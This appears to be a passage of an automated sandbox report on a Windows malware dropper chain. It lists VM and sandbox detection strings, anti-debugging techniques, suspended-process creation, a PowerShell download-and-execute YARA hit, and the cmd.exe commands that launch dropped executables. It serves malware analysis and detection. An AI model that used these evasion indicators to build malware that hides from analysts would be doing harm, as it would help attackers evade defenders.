Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: userKFHCAEGCBF.exe, 00000012.00000003.2567537123.000000000169B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: xVBoxService.exe
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8EA0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645513517.000001F414940000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 8ec8c5c339.exe, 0000000A.00000002.2721852651.00000000025EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: VBoxService.exe
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: 1c593ec106.exe, 0000001F.00000002.2936767105.00000000020D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: VMWare
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: 8ec8c5c339.exe, 0000001E.00000002.2782069458.000000000272E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW9c
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: #Windows 11 Microsoft Hyper-V Server

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Thread information set: HideFromDebugger
Source: C:\Users\userKFHCAEGCBF.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Code function: 0_2_04C80081 Start: 04C8041B End: 04C800AA		0_2_04C80081
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Code function: 0_2_04C80B54 Start: 04C80B74 End: 04C80B70		0_2_04C80B54

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Process queried: DebugPort
Source: C:\Users\userKFHCAEGCBF.exe	Process queried: DebugPort
Source: C:\Users\userKFHCAEGCBF.exe	Process queried: DebugPort
Source: C:\Users\userKFHCAEGCBF.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe

Code function: 0_2_04C80CC5 rdtsc

0_2_04C80CC5

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

Code function: 8_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

8_2_0041ACFA

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

Code function: 8_2_00404610 VirtualProtect ?,00000004,00000100,00000000

8_2_00404610

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

8_2_0041BA2C

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_0034645B mov eax, dword ptr fs:[00000030h]	7_2_0034645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_0034A1C2 mov eax, dword ptr fs:[00000030h]	7_2_0034A1C2
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_00419160 mov eax, dword ptr fs:[00000030h]	8_2_00419160

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

Code function: 8_2_00405000 GetProcessHeap,HeapAlloc,memcpy,

8_2_00405000

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_0041C8D9 SetUnhandledExceptionFilter,	8_2_0041C8D9
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_0041ACFA
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_0041A718
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1FB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_6C1FB66C
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C1FB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_6C1FB1F7
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Code function: 8_2_6C3AAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_6C3AAC62

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: 8ec8c5c339.exe PID: 8052, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8ec8c5c339.exe PID: 6704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8ec8c5c339.exe PID: 848, type: MEMORYSTR

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe "C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process created: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe "C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingHJDBKJKFIE.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userKFHCAEGCBF.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe "C:\Users\user\AppData\RoamingHJDBKJKFIE.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userKFHCAEGCBF.exe "C:\Users\userKFHCAEGCBF.exe"
Source: C:\Users\userKFHCAEGCBF.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

8_2_6C3F4760

Source: 1c593ec106.exe, 00000009.00000002.2918001289.0000000000452000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2917186375.0000000000452000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2919090874.0000000000452000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: explorti.exe, explorti.exe, 00000007.00000002.2920362161.000000000050B000.00000040.00000001.01000000.00000007.sdmp, userKFHCAEGCBF.exe, 00000012.00000002.2598761608.0000000000DF9000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 7_2_0032D312 cpuid

7_2_0032D312

